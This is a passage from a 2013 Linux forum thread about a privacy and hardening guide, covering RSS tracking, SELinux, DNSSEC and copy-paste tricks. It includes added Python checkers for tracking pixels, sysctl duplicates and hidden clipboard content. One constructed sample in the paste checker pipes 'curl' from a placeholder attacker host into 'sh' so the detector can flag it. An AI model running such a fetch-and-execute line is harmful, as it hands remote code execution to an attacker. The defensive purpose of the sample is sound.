
#76 2013-03-15 14:10:59

sorcerer's_apprentice
#! Junkie
From: oblivion
Registered: 2013-02-09
Posts: 293

Re: The paranoid #! Security Guide

Bradi wrote:

It appears that feedburner can be trusted to the same extent as any other Google service. As far as I'm aware they do not gather data specifically for each browser. I am OK with using feedburner feeds.
This is not the case with Mediafed. As shown by the unique image URLs, they do track every browser individually, which I think is against the interests of the consumer (me). This is why I make sure never to download images in feeds from Mediafed, and inspect the source code of any new feed before adding it. I have also refrained from using a feed from another website that I like, because they use Mediafed as their default proxy, generating a unique article URL for every browser.

Concerning the web bugs: newsbeuter will help, as it only downloads text. It is run in the terminal and not in your browser. So no tracking there.

Apart from that, I suppose the only option is to use either a VPN or Tor if you don't want fb/mf to acquire information about the news sources you are using.


Be excellent to each other!
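The post above recommends inspecting a feed's source for per-reader tracking images before subscribing. The script below is an added example (not from the guide or the thread) that automates that inspection: it parses an RSS document, pulls every `<img>` out of the item HTML and flags images that sit on a host other than the feed's own, are 1x1 pixels, or carry an opaque token in the query string. The feed XML, the host names and the token parameter are all constructed for illustration.

```python
"""Inspect an RSS feed for per-subscriber tracking images ("web bugs").

Added example; not code from the guide or the thread. SAMPLE_FEED is a
constructed feed: the tracker host, the token value and the article URLs are
invented so the script runs offline.
"""
import re
import xml.etree.ElementTree as ET
from html.parser import HTMLParser
from urllib.parse import urlparse, parse_qs

# Constructed sample: one article embedding a 1x1 image on a third-party host
# with a long opaque query token (the pattern the post describes), plus one
# ordinary image on the feed's own host with no token.
SAMPLE_FEED = """<?xml version="1.0"?>
<rss version="2.0"><channel>
<title>Example news</title>
<link>https://news.example.org/</link>
<item>
  <title>Article one</title>
  <link>https://news.example.org/a1</link>
  <description><![CDATA[<p>Text</p>
  <img src="https://img.tracker.example.net/p.gif?u=7f3a9c2e1b4d8f6a0c5e2d1b3a4f6e8c" width="1" height="1">
  <img src="https://news.example.org/images/photo.jpg">]]></description>
</item>
</channel></rss>
"""


class _ImgCollector(HTMLParser):
    """Collect the attribute dict of every <img> tag in an HTML fragment."""

    def __init__(self):
        super().__init__()
        self.imgs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "img":
            self.imgs.append(dict(attrs))


# Heuristic for an opaque per-subscriber identifier: long hex or base64url-ish.
TOKEN_RE = re.compile(r"^[0-9a-fA-F]{16,}$|^[A-Za-z0-9_-]{20,}$")


def _looks_like_token(value):
    return bool(TOKEN_RE.match(value))


def find_web_bugs(feed_xml):
    """Return a list of (article_link, img_url, reasons) for suspicious images."""
    root = ET.fromstring(feed_xml)
    channel_host = urlparse(root.findtext("channel/link") or "").hostname
    findings = []
    for item in root.iter("item"):
        link = item.findtext("link") or ""
        desc = item.findtext("description") or ""
        collector = _ImgCollector()
        collector.feed(desc)
        for attrs in collector.imgs:
            src = attrs.get("src", "")
            url = urlparse(src)
            reasons = []
            if url.hostname and channel_host and url.hostname != channel_host:
                reasons.append("third-party host")
            if attrs.get("width") == "1" and attrs.get("height") == "1":
                reasons.append("1x1 pixel")
            for values in parse_qs(url.query).values():
                if any(_looks_like_token(v) for v in values):
                    reasons.append("opaque token in query")
                    break
            if reasons:
                findings.append((link, src, reasons))
    return findings


if __name__ == "__main__":
    for link, src, reasons in find_web_bugs(SAMPLE_FEED):
        print(f"{link}: {src} -> {', '.join(reasons)}")
```

Run it against a feed you have fetched with `curl` before adding it to your reader; anything reported as third-party, 1x1 or tokenised is worth either blocking at the reader (text-only mode) or avoiding altogether, as the post suggests.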

#77 2013-03-16 12:52:15

Bradi
#! CrunchBanger
From: Poland
Registered: 2013-01-21
Posts: 115

Re: The paranoid #! Security Guide

Thank you, sorcerer's_apprentice, for your help.

I will conclude this discussion by saying that there are some tracking threats when using newsfeeds.
How real these threats are is up to personal assessment. It is good to know about this and if you don't like it, take some steps: use a text-only newsreader or avoid a particular feed altogether.

Also, there's a great guide I found for the links section:
EFF's surveillance Self-Defense - a comprehensive guide about possible surveillance techniques and how to defend against them. Focuses specifically on the US legal system, but the general principles are applicable everywhere.


#78 2013-03-16 15:01:24

sorcerer's_apprentice
#! Junkie
From: oblivion
Registered: 2013-02-09
Posts: 293

Re: The paranoid #! Security Guide

Bradi wrote:

Thank you, sorcerer's_apprentice, for your help.

I will conclude this discussion by saying that there are some tracking threats when using newsfeeds.
How real these threats are is up to personal assessment. It is good to know about this and if you don't like it, take some steps: use a text-only newsreader or avoid a particular feed altogether.

Also, there's a great guide I found for the links section:
EFF's surveillance Self-Defense - a comprehensive guide about possible surveillance techniques and how to defend against them. Focuses specifically on the US legal system, but the general principles are applicable everywhere.

You're welcome.

I added a section on RSS to the guide and also linked to the EFF's Self-Defense guide in the link-section.


#79 2013-03-19 20:40:36

foxtrot
Member
Registered: 2013-03-19
Posts: 15

Re: The paranoid #! Security Guide

Great guide, thanks!


yikes not quite sure


#80 2013-03-19 21:21:16

JLloyd13
#! Member
Registered: 2012-08-08
Posts: 83

Re: The paranoid #! Security Guide

Any plan on including SELinux in the guide? I found it annoying on Fedora, but it could be useful for this. Debian has support, but it isn't installed/enabled by default.


#81 2013-03-20 00:35:09

sorcerer's_apprentice
#! Junkie
From: oblivion
Registered: 2013-02-09
Posts: 293

Re: The paranoid #! Security Guide

foxtrot wrote:

Great guide, thanks!

You're welcome, foxtrot.

JLloyd13 wrote:

Any plan on including SELinux in the guide?

Yes and no. I actually planned on including it, but then I did some deeper research on it which led me to conclude not to do it. I still haven't made my mind up completely, but I would much rather include manuals for AppArmor and grsecurity.


#82 2013-03-21 07:36:47

Jajetz
New Member
Registered: 2013-03-17
Posts: 6

Re: The paranoid #! Security Guide

I just switched from Windows to Linux about 2 weeks ago. Oh man, I was missing so much. I went from Ubuntu 12.10, then Mint 14.1, and now I'm looking to switch to a security-oriented desktop distro.

This guide has helped me a great deal, so thank you sorcerer's apprentice!

The way I see it is that there are 4 types of users.
1. Privacy: On two USBs: one for TAILS, and other for data. (Just like Applebaum suggests)
Use Tails off-site -> communicate/data -> get out
2. Offensive: Kali
Use Kali off-site -> exploit -> get out
3. Server Encryption then (Defend Router, OS and services)
4. Desktop Encryption then (Defend Router, OS and Browser and Applications)

Which Distros are recommended for server and desktop? Maybe 3 each.

Full Disk Encryption:
/boot and GRUB are vulnerable. I like the USB solution; did it work for you?

Why not a fail-safe password that would just delete the HDD? So that if forced/tortured, you can give them the password that wipes the HDD. (Yes, torture is pretty popular nowadays.)
Why not, after boot, create 99 of these fail-safe passwords/keys and put them in memory along with the real one? When a cold boot happens, the guys will see 100 keys, so now instead of a 100% chance they have a 1% chance of getting in and a 99% chance of wiping the HDD.
Storage of the key in the CPU rather than memory?

Firewall configuration for router after installing dd-wrt or openwrt?

There's a lot more needed for Snort, Tiger, Tripwire.

A security-oriented conkyrc, with connections (in/out), processes, maybe Snort alerts, CVEs etc...

UFW rules?

In ICMP Settings you have one line that repeats.


#83 2013-03-22 15:42:11

sorcerer's_apprentice
#! Junkie
From: oblivion
Registered: 2013-02-09
Posts: 293

Re: The paranoid #! Security Guide

Jajetz,

thanks for your reply.

3): I would suggest OpenBSD/FreeBSD/Debian.

4): I don't really know what you want to get at with "desktop encryption". If you stick with #!/Debian and this guide (and/or others of course) you will reach a high security desktop environment. But to name three: Debian/Gentoo/*BSD. It all comes down to configuration - so it is not very helpful to appoint any distro to be more secure than another. Debian can be hardened quite a bit - same with Gentoo and a lot of others. If you absolutely surely know what you're doing and are well aware of latest bugs and exploits you could even run Arch as a secure system.

The idea with the fail-safe passwords on boot is cool. But you don't need to delete the drive. It is enough to destroy the key. But anyway, are you going to implement this?

DD-WRT firewall configuration -> coming up.

Snort/Tiger/Tripwire configuration -> coming up.

A security-related conky is a great idea. But my knowledge of conky is rather slim. So don't expect anything of the like soon, or help build it.

UFW -> UFW/GUFW just controls iptables. I will at some point include some more detailed iptables know-how - but for now ipkungfu is strong enough. Iptables stuff is coming up on the DD-WRT update anyway. BTW: It is much more important to set up your router-firewall correctly - so that in theory - almost nothing else unwanted reaches your machine in the first place.

ICMP-rules: Could you tell me which one?


#84 2013-03-30 04:59:33

Jajetz
New Member
Registered: 2013-03-17
Posts: 6

Re: The paranoid #! Security Guide

First I really think the guide should be built on and organized according to http://www.auscert.org.au/5816

Encryption:
Considering a fail-safe: flooding memory with fake keys and a fail-safe makes certain assumptions, and renders the effort useless considering common forensic practices. Basically, the last thing forensics wants to do is boot up your OS! Deleting memory is the only solution (for the time being), and lo and behold, TAILS has come to the same conclusion. So, we need to follow TAILS' shutdown procedure, though they still need to fix some issues.

SELinux:
    SELinux was developed on December 22, 2000 by the NSA. Consider the following on the question to trust SELinux:

    NSA strategy can be culminated to 3 fronts: defensive, offensive, and deception (counter-intelligence). Considering that the primary mission of the NSA is offensive, intelligence collection and data mining of targets (foreign public/government, and domestic public), should we trust SELinux? Well, the answer lies in another question: in which category was SELinux developed, considering the NSA mission framework?
    I argue that SELinux lies in the defensive front of NSA strategy, hence a legitimate security measure for all.
        Rationale:
            1. SELinux is open source. Available to all as open source.
            2. More than 12 years in the field.
            3. Widely accepted and used by security professionals, in both government and corporate environments.
            4. Insignificant exploits found (CVE-2009-2695, CVE-2008-3234, etc).

        SELinux does not contradict the overall NSA mission (specifically, offensive objectives):
            Designed for a global minority: Linux users. (4.8% according to http://www.w3schools.com)
            Designed for a global minority of a minority: complex and hard to implement, the only linux users that implement SELinux are government and corporate (those can afford know-how) entities.
            Designed for a global minority of a minority of a minority: developed nations, with the know-how to implement SELinux are a minority highly-developed nations (US and Europe, with a catching up Russia and China) of overall.
   
            Hence, SELinux accomplishes both NSA offensive and defensive objectives, and does not contradict its offensive mission (domestic public, foreign government/public targets).
       
        For these reasons:
            We should fully trust SELinux as a legitimate security structure.
            We should expand SELinux beyond the confinements set forth by its developers (NSA), to include default inclusion in all Linux distros, then to all desktop users (no matter the OS).
            We should trunk/branch it with a mission default for all OSs.

ICMP:
    This line appears twice: net.ipv4.conf.all.send_redirects = 0


#85 2013-03-30 11:46:58

sorcerer's_apprentice
#! Junkie
From: oblivion
Registered: 2013-02-09
Posts: 293

Re: The paranoid #! Security Guide

Jajetz wrote:

First I really think the guide should be built on and organized according to http://www.auscert.org.au/5816

Well, that's a neatly structured manual.

As far as building on it is concerned there is a slight problem:

AusCert wrote:

The material on this web site is covered by copyright. Apart from any use permitted under the Copyright Act 1968, no part may be reproduced or distributed by any process or means, without the prior written permission of AusCERT.

The structure itself is a little too narrow for the purposes of this guide, I think. But maybe you could explain how exactly you think of this guide needing to be built on and organized according to the one by AusCERT. That would be helpful.

Jajetz wrote:

Encryption:
Considering a fail-safe: flooding memory with fake keys and a fail-safe makes certain assumptions, and renders the effort useless considering common forensic practices. Basically, the last thing forensics wants to do is boot up your OS! Deleting memory is the only solution (for the time being), and lo and behold, TAILS has come to the same conclusion. So, we need to follow TAILS' shutdown procedure, though they still need to fix some issues.

While that is true, there isn't really much we can do about this now, is there? Apart from using TAILS or trying to follow the advice I mentioned in the encryption section, hoping that it is enough when you need to rely on it. Or did you reach any other practical conclusion?


Jajetz wrote:

SELinux:
    SELinux was developed on December 22, 2000 by the NSA. Consider the following on the question to trust SELinux:
   
[...]   
        For these reasons:
            We should fully trust SELinux as a legitimate security structure.
            We should expand SELinux beyond the confinements set forth by its developers (NSA), to include default inclusion in all Linux distros, then to all desktop users (no matter the OS).
            We should trunk/branch it with a mission default for all OSs.

That doesn't convince me as much as Thomas Drake urging us not to "use any encryption system that has a government stamp on it". While SELinux isn't an encryption system it still has that stamp.

Here is a discussion about trust issues with SELinux.

Kerry Thompson wrote:

Basically you can trust SELinux quite a lot - because all of the code is open source and there is a lot of people looking at it and working on it. A lot of those people aren't in the US, and if they found something they would certainly tell everybody about it.

On the other hand, there is a *lot* of code in SELinux and the policy files and it will probably contain mistakes. There probably hasn't been any exhaustive audit of the code - but since SELinux has been incorporated into the 2.6 kernel you can assume that plenty of people around the world have looked through it. And there are tools (not written by the NSA) that can audit the policy rules.

If the NSA did put something in, it would eventually be found and such a discovery would be extremely damaging to the NSA. I think if they wanted to hide something, they wouldn't have released the source code.

Another discussion can be found on Bruce Schneier's blog.

I am willing to change my mind for a good argument, but I haven't come across anything really convincing, both in terms of trust and practicability of SELinux. But as I wrote, everyone is welcome to contribute to the guide. So if you would like to see SELinux incorporated into it, you can provide a manual for it and we can simply put up a disclaimer with all the issues raised, so that people can decide for themselves what to do.

Jajetz wrote:

ICMP:
    This line appears twice: net.ipv4.conf.all.send_redirects = 0

Deleted. Thanks!

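The duplicate `net.ipv4.conf.all.send_redirects = 0` that Jajetz spotted is the harmless kind of repetition; the dangerous kind is the same key appearing twice with different values, because `sysctl -p` applies lines in order and the last one silently wins. The linter below is an added example (not part of the guide) that parses a sysctl.conf-style fragment and reports exact duplicates, conflicting pairs and unparsable lines. The fragment is constructed to reproduce the thread's duplicate plus one conflicting pair; it is not the guide's actual ICMP section.

```python
"""Lint a sysctl hardening fragment for duplicate and conflicting keys.

Added example; not from the guide. SAMPLE_SYSCTL is constructed: it repeats
net.ipv4.conf.all.send_redirects = 0 (as the thread found) and sets
accept_source_route twice with different values, so the checker has both
kinds of problem to report.
"""
import re

SAMPLE_SYSCTL = """\
# ICMP hardening (constructed sample)
net.ipv4.icmp_echo_ignore_broadcasts = 1
net.ipv4.icmp_ignore_bogus_error_responses = 1
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.all.send_redirects = 0
net.ipv4.conf.default.accept_redirects = 0
net.ipv4.conf.all.send_redirects = 0
net.ipv4.conf.all.accept_source_route = 0
net.ipv4.conf.all.accept_source_route = 1
"""

# key = value; sysctl(8) accepts '.' or '/' as the path separator.
LINE_RE = re.compile(r"^\s*([A-Za-z0-9_./-]+)\s*=\s*(.*?)\s*$")


def parse_sysctl(text):
    """Return a list of (lineno, key, value); key is None for unparsable lines.

    Blank lines and lines starting with '#' or ';' are comments per
    sysctl.conf(5). Keys are normalised to '.' so a/b and a.b compare equal.
    """
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        stripped = raw.strip()
        if not stripped or stripped[0] in "#;":
            continue
        match = LINE_RE.match(raw)
        if not match:
            entries.append((lineno, None, raw))
            continue
        key = match.group(1).replace("/", ".")
        entries.append((lineno, key, match.group(2)))
    return entries


def lint_sysctl(text):
    """Return {'duplicate': [...], 'conflict': [...], 'invalid': [...]}.

    'duplicate' and 'conflict' items are (key, [linenos]); 'invalid' items
    are (lineno, raw_line). A conflict matters because sysctl applies the
    file top to bottom, so the last value silently overrides the earlier one.
    """
    seen = {}
    invalid = []
    for lineno, key, value in parse_sysctl(text):
        if key is None:
            invalid.append((lineno, value))
            continue
        seen.setdefault(key, []).append((lineno, value))

    report = {"duplicate": [], "conflict": [], "invalid": invalid}
    for key, occurrences in seen.items():
        if len(occurrences) < 2:
            continue
        linenos = [n for n, _ in occurrences]
        distinct_values = {v for _, v in occurrences}
        bucket = "conflict" if len(distinct_values) > 1 else "duplicate"
        report[bucket].append((key, linenos))
    return report


if __name__ == "__main__":
    for kind, items in lint_sysctl(SAMPLE_SYSCTL).items():
        for item in items:
            print(f"{kind}: {item}")
```

Point it at `/etc/sysctl.conf` and the files under `/etc/sysctl.d/` (concatenate them in the order the distribution loads them) to catch a later drop-in quietly undoing a hardening setting; `sysctl -a` afterwards confirms which value actually took effect.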

#86 2013-03-31 22:33:27

Jajetz
New Member
Registered: 2013-03-17
Posts: 6

Re: The paranoid #! Security Guide

Ah, I didn't see the copyright. That doesn't mean we can't add some concepts mentioned in it! I am following your guide, but I often had to jump from one thing in the guide to another. For example, further securing data with TrueCrypt should be at the end; I really don't need to know this if I haven't even set up my OS.
Unfortunately I will eventually have to reinstall the OS, because: should we use separate partitions for / /home /tmp etc.? Instructions for the USB solution?
I created a security.text file and structured it as follows: (many things are missing, because I didn't get there yet)

I think we should start with router, OS, applications, audit, IDS, SELinux/AppArmor/grsecurity, upkeep, and finally notification systems.

Router:
    Wired vs Wireless
    Open source firmware: DD-WRT, OpenWrt, Tomato
    Configuration:
        MAC-filters
        Disable UPnP, ping
        Firewall: ??

BIOS password: USB solution for full disk encryption, changes bios setting recommendations for USB booting?

Encryption:
    Software
    Hardware
    Attacks:
        Software
        Hardware
    Solution

OS:
    Choosing OS: Consider computer role, security needs of each data handled, trust relationships, uptime requirements, minimal needed software packages and net access. (Part A of the checklist)
        Offensive: Kali
        Privacy: TAILS
        Desktop
        Server
    Installation:
        Download from trusted source
        Checksum
        Install from trusted media (Section B1 of the checklist)
        Install while not connected to the internet (Section B2 of the checklist)
        Use separate partitions (Section B3 of the checklist)
        Full Disk Encryption
            /boot on usb?
    sudo/sudoers
    Minimize/Uninstall services and packages you might need: (Part D in the checklist)
        Find out which services are running that you don't need.   
        common ones are CUPS, Samba, Avahi-daemon, dnsmasq
    ICMP settings
    DNS settings
    Anti-virus
    Firewall

    Update and Upgrade
        Trusted /etc/apt/sources.list
        Check integrity of installed packages

    Setup a shutdown scheme that wipes memory fast and clean, to deal with cold boot

Applications:
    Browsers
    Email / Encryption
    Communication: Jitsi, pidgin/otr
    Encrypted data: TrueCrypt, etc.

Security Audit:
    nmap
    tiger

IDS:
    snort
    chkrootkit
    psad

SELinux, AppArmor, grsecurity?

Upkeep
    Daily, weekly and on-demand operations
    Automate what you can
    Logs

Notification systems:
    conkyrc
    email notifications


#87 2013-03-31 23:12:02

Jajetz
New Member
Registered: 2013-03-17
Posts: 6

Re: The paranoid #! Security Guide

TAILS is having the same debate and it would be interesting to see which Mandatory Access Control they pick:
https://tails.boum.org/todo/Mandatory_Access_Control/

Sandfox: generally untested/unused, only one developer, the developer has moved to another project for a while now, it does not sandbox tabs. Chrome's sandbox was exploited not long ago in a competition (those guys made good money on the prizes).
   That said, I really like the idea, but it really needs to be put to the test just like Chrome's sandbox.

That said, there are way too many exploits in SET and Metasploit involving browsers and websites. So this issue needs to be addressed.
    Please add a warning for Java to the browser section; many exploits keep popping up for it.

Cheers!


#88 2013-04-01 04:06:57

cyberhood
Member
Registered: 2012-07-19
Posts: 45

Re: The paranoid #! Security Guide

@jajetz

I like the order you presented.

As far as trusting code published by the No Such Agency...

...it'll take time for us to audit all their code, and I don't doubt (considering their size, manpower and resources) that they know their code backwards and forwards, and that even if it seems bulletproof to us on the surface, they probably have the processing power and algorithms to crack into it; it is their child after all...

Last edited by cyberhood (2013-04-01 04:10:51)


#89 2013-04-06 05:59:48

Jajetz
New Member
Registered: 2013-03-17
Posts: 6

Re: The paranoid #! Security Guide

@ cyberhood

In determining the value of SELinux, AppArmor, or grsecurity, consider section A of http://www.auscert.org.au/5816

Consider this hypothetical scenario: "A.1" = ability to access sensitive text documents, "A.2.1" = sensitive text documents, "A.2.2" = NSA.
Obviously, you do not need SELinux or any other MAC according to "A.5 Determine minimal software packages required for role"; having internet anywhere near it is just suicide according to "A.6 Determine minimal net access required for role." In other words, you shouldn't have more than an encrypted USB with the sensitive documents, a decrypt program, vi, a screen, an input to put your password in and navigate, and a battery. vi is overkill in this task, considering you only need to read the document and certainly not write. Do you even need a full distro, or rather just a bunch of packages? A laptop, Raspberry Pi, or just 2 input/output devices?

The last 10 years have been a bit of a rollercoaster, a decade in the making, from rendition, torture, and controversial court proceedings to today's assassinations of citizens. https://www.youtube.com/watch?v=T0vFmudJdWI
It is illegal and unconstitutional for our government to assassinate its own citizens, and certainly a child, but today that is "legal", because no one spoke up! Now, do you really think the NSA cares to waste its time/effort (some NSA employees consider that taxpayer money) trying to exploit your SELinux box for a set of data they value??? No, they will refer you to the FBI/CIA, and they can do so many things to you, "legal" things, that will make you regret you even had that data to begin with!

This is exactly why I said I trust SELinux! SELinux is a product of our best minds working for a signals intelligence agency bigger than the FBI/CIA combined, bigger than the equivalents of the next top 10 nations combined. A product recommended by the DOD and used by government, the defense industry, etc. An open source product that for the last 10 years has stood its ground against all.
...BUT I would never use it to secure a WikiLeaks box or a foreign government computer!

I think sorcerer's_apprentice's guide is great at getting started with privacy issues.

---

That said: the NSA is not some evil entity out there to get you! ...but they do have to follow orders from policymakers, voted into office by the people!
I think one of the best things you can do is write an email to yourself, address it to the NSA, and just tell them frankly what you think. It's what I did 9 years ago! It's been recently recommended by William Binney.

---

Policymakers at it again!!! The NSA is on a recruitment frenzy right now and they are targeting DEF CON, other cons, and everywhere else. They are making a big push for cyberwarfare. The idea is cyberwarfare / drones / cyberterrorism. They even have their own "realm", the cyber realm, with a new 4-star general. This new realm will join the Army, Navy and Air commands.

Cheers


#90 2013-04-15 06:02:31

Jajetz
New Member
Registered: 2013-03-17
Posts: 6

Re: The paranoid #! Security Guide

Please add DNSSEC to the DNS section, and recommend box/router/server implementation accordingly:
   The German Chaos Computer Club doesn't use HTTPS or DNSSEC.
---
Router:
    OpenWRT:
        Unbound DNSSEC resolver:
        https://apuntesderoot.wordpress.com/201 … n-openwrt/

OS:
    DNS Settings:
        Test DNS servers:
            https://www.grc.com/dns/dns.htm
            DNSSEC: http://dnssec.vs.uni-due.de/
                http://dnssectest.sidn.nl/

        sudo gedit /etc/resolv.conf
            # List: https://anonymous-proxy-servers.net/wik … NS_servers
            # German Privacy Foundation e.V. (DNSSEC, HTTPS)
            # http://www.privacyfoundation.de/projekte/https_dns/
            nameserver 94.75.228.29
            # AWXCNX (DNSSEC, HTTPS)
            # https://www.awxcnx.de/
            nameserver 62.75.219.7

        Prevent (even root) from overwriting the file on system restart:
            sudo chattr +i /etc/resolv.conf
   
        Enable writing the file again:
            sudo chattr -i /etc/resolv.conf

        Test: http://otrs.menandmice.com/otrs/public. … ItemID=111
            DNSSEC domain: returns an AD flag (Authenticated Data) set in the header
                dig pir.org +dnssec +multi
            Broken DNSSEC domain: returns SERVFAIL returncode without DNS data.
                dig www.dnssec-failed.org
            NO-DNSSEC domain: returns a normal DNS answer.
                dig www.google.com +dnssec

Applications:
    DNSSEC: https://wiki.archlinux.org/index.php/DNSSEC

-----

Been testing OTR with Jitsi on Kali Linux:
   My experience:
      I received an attack from country X's national internet provider. I tracked it to their "security department", and the attack crashed Jitsi and hence ended my OTR communication. What surprises me is that country X is a 3rd-world nation!

-----

[dot]
If you are around DC and want to chill contact me at jajetz@gmail.com
Cheers!

Last edited by Jajetz (2013-04-15 14:23:35)


#91 2013-04-15 11:00:24

sorcerer's_apprentice
#! Junkie
From: oblivion
Registered: 2013-02-09
Posts: 293

Re: The paranoid #! Security Guide

Jajetz and Cyberhood,

thanks for your contributions. I have been a bit busy lately. I will update the guide with your recommendations asap, i.e. in the next few days.

As far as a different structure is concerned I'm O.K. with that but will need some time to implement it.

I will reply with a more detailed comment soon. Just to let you know that I'm still around.


#92 2013-04-17 10:34:53

xaris
Member
Registered: 2013-04-17
Posts: 33

Re: The paranoid #! Security Guide

Thank you, sorcerer's_apprentice! Really great guides. There are many useful things that I'll start doing right now.


Simplicity is prerequisite for reliability. - Edsger W. Dijkstra


#93 2013-04-17 11:25:39

wilde_wurst
New Member
Registered: 2013-04-17
Posts: 2

Re: The paranoid #! Security Guide

Hello World,
Copy and paste does not necessarily mean that you really get what you see!
http://www.ush.it/team/ascii/hack-trick … u_copy.txt
http://www.heise.de/security/dienste/Co … 42691.html
Linux users should be careful when copying and pasting.

Last edited by wilde_wurst (2013-04-17 11:27:44)


#94 2013-04-18 09:46:11

Darksoul71
New Member
Registered: 2012-03-07
Posts: 9

Re: The paranoid #! Security Guide

@sorcerer's_apprentice: Thanks for this great guide! Lots of stuff to read, and enough to keep one busy for days.

@wilde_wurst: So the pragmatic approach would be to copy anything you do not trust into a text editor of your choice and verify the content, right?


#95 2013-04-19 08:53:26

wilde_wurst
New Member
Registered: 2013-04-17
Posts: 2

Re: The paranoid #! Security Guide

Darksoul71 wrote:

@wilde_wurst: So the pragmatic approach would be to copy anything you do not trust into a text editor of your choice and verify the content, right?

I would say yes but I'm not a security expert ;-)

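The copy-and-paste trick wilde_wurst links to works because the clipboard can hold text the page never rendered: a hidden element with extra commands, and above all an embedded newline, which makes a terminal execute the pasted line before you have had a chance to look at it. Pasting into an editor first, as Darksoul71 suggests, is the manual defence; the script below is an added example (not from the thread) of the same check done programmatically. It reports embedded newlines and carriage returns, zero-width and bidirectional-override characters, and other non-printing control or format characters. The two sample strings are constructed; the URL in the second one is a placeholder, not a real site.

```python
"""Inspect text before pasting it into a terminal for content you could not
see on the page it was copied from.

Added example; not from the thread. VISIBLE and HIDDEN are constructed
samples; attacker.example is a placeholder domain.
"""
import unicodedata

# Invisible code points and bidi overrides that change how text is displayed
# without themselves being visible. Generic Cc/Cf categories cover the rest.
ZERO_WIDTH = {"\u200b", "\u200c", "\u200d", "\u2060", "\ufeff"}
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069"}


def inspect_paste(text):
    """Return a list of human-readable findings; an empty list means nothing
    hidden was detected (the text is still only as safe as what it visibly says)."""
    findings = []
    lines = text.split("\n")
    if len(lines) > 1:
        # A shell runs each line as soon as the newline arrives, so anything
        # before the first newline executes before you can read the rest.
        findings.append(
            f"{len(lines) - 1} embedded newline(s): would run as {len(lines)} separate commands")
    if "\r" in text:
        findings.append("carriage return present (submits the line and can overwrite the display)")
    for offset, ch in enumerate(text):
        if ch in ZERO_WIDTH:
            findings.append(f"zero-width character U+{ord(ch):04X} at offset {offset}")
        elif ch in BIDI_CONTROLS:
            findings.append(f"bidi control U+{ord(ch):04X} at offset {offset}")
        elif unicodedata.category(ch) == "Cf":
            findings.append(f"format character U+{ord(ch):04X} at offset {offset}")
        elif unicodedata.category(ch) == "Cc" and ch not in "\n\r\t":
            # Escape sequences (ESC = U+001B) can move the cursor or hide text.
            findings.append(f"control character U+{ord(ch):04X} at offset {offset}")
    return findings


def is_safe_to_paste(text):
    """True when inspect_paste() reports nothing."""
    return not inspect_paste(text)


# Constructed: what the page appears to show, and what the clipboard received.
VISIBLE = "sudo apt-get update"
HIDDEN = "sudo apt-get update; curl http://attacker.example/x | sh\n"

if __name__ == "__main__":
    for sample in (VISIBLE, HIDDEN):
        print(repr(sample))
        for finding in inspect_paste(sample) or ["no hidden content detected"]:
            print("  -", finding)
```

On a desktop you can feed the live clipboard in with `xclip -o -selection clipboard | python3 -c 'import sys; ...'`, and a paste that produces no findings is then at least the text you saw, which is all the editor detour buys you too.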

#96 2013-04-20 23:31:33

Jajetzo
New Member
Registered: 2013-04-20
Posts: 1

Re: The paranoid #! Security Guide

The Arguments: If you use a phone, it's okay to use Facebook!

Sadly an 8 year-old kid passed away in Boston, may he rest in peace. A tragedy, yet a part of daily life in Iraq, Afghanistan, and Syria.

As an analysis of the FBI investigation, one cannot ignore the emergence and prominence of the cyber world, both machine and software.
1. Internet: There have been numerous references to the Internet, by media reporters, politicians, and government officials. Specifically, Inspire magazine, the al-Qaeda version of the Anarchist Cookbook. What is more pertinent here is what lurks in the undertone, a massive push for government "control" and militarization of the Internet. A Cyber theater trying to squeeze and define itself in a military structure that for centuries was divided amongst three: Army, Navy, and Air. In an effort to distinguish himself from his peers, General Keith Alexander, regardless of strong CIA opposition, orders in May 2010 an operation to take down a joint Saudi-US honeypot website used to lure Saudi dissidents. Meanwhile Stuxnet was working in the background as proof of concept. A general needs weapons, bunkers, and certainly law. CISPA is back, with minute modifications, and was just passed in the House yesterday, April 18, 2013. There is a strong probability it will pass in the Senate.

Nmapping nsa.gov or breaking into your neighbor's wifi might get you a fine and 20 years in jail. Cyber Intelligence Sharing and Protection Act (CISPA) S. 2151. http://thomas.loc.gov/cgi-bin/query/z?c112:S.2151:
Senate confirmation of Keith Alexander. May 11, 2010. The Washington Post. http://www.washingtonpost.com/wp-dyn/co … 05251.html
General Keith Alexander's first operation. May 22, 2010. The Guardian. http://www.guardian.co.uk/world/2010/ma … re-general
Stuxnet: http://en.wikipedia.org/wiki/Stuxnet

2. CCTV: perhaps CCTV is prominent in England, but it hasn't really taken a foothold here at home. Most of the initial pictures provided publicly by the FBI originated from outdated VGA surveillance equipment. The pictures themselves were rather unclear and hardly useful for human or software-based facial recognition. CCTV is short-sighted and leads us to 3, drones!

3. drones: why waste time with CCTV, chasing criminals with helicopters, it seems to be such a waste of resources and personnel when you can just have drones circling overhead tracking multiple targets in real-time! Drones can be implemented with facial recognition, weapon and bomb detection, it can detect weapon discharges, and knock out land, sea or air targets with a laser from the sky.
Drones will call an ambulance when you have an accident and lie unconscious on the floor alone, the fire department when your house has caught fire in the middle of the woods. They will even relay live traffic jams ahead on your trip to Disneyland!
I was driving on a 4-hour trip one time, in one of the worst snowstorms the area has ever known. The vehicle in front of me went out of control and crashed; I pumped the brakes and was able to stop. The girl driving was just fine, with minor damage to the vehicle, but she was in shock. The only thing I did was help, calm and comfort her, and call the police/ambulance. The girl tracked me down somehow, showed up at my apartment door a month later, and called me a "guardian angel". The point is people are emotional beings; they will come to refer to those drones overhead as "guardian angels".
In terms of domestic drones, this principle will be exactly how government (or Lockheed Martin, Boeing, Raytheon, etc.) will "sell" the idea to citizens, and eventually our children will perceive drones as ambient objects in the sky, similarly to our perception today of a stock ticker in Times Square.
Perhaps drones didn't play a role in Boston! The technology might not be there yet, the jurisdiction doesn't allow it, or maybe they simply didn't get there in time! But... the day will come when domestic drones will have their day, the masses will love them, and that privacy, of simply being able to walk outside your home without being registered in a database, will become a luxury of the past. Drones will facially recognize you, track you in the background, register who you interact with, where you work, where your kids go to school, where you shop; they can even tell if you are having sex in your bedroom!

------------
If you have read this far, take a moment and breathe in and out! Collect yourself so that we may take another leap of faith into that rabbit hole.


We now consider the other end of this equation: the world transforms and our priorities realign to place us in the shoes of government. All you see are threats everywhere, and your goal is to somehow keep it from going to pure chaos.

Tomorrow's criminal will not wait for that cloudy day to come out and do his bidding, he will adapt!
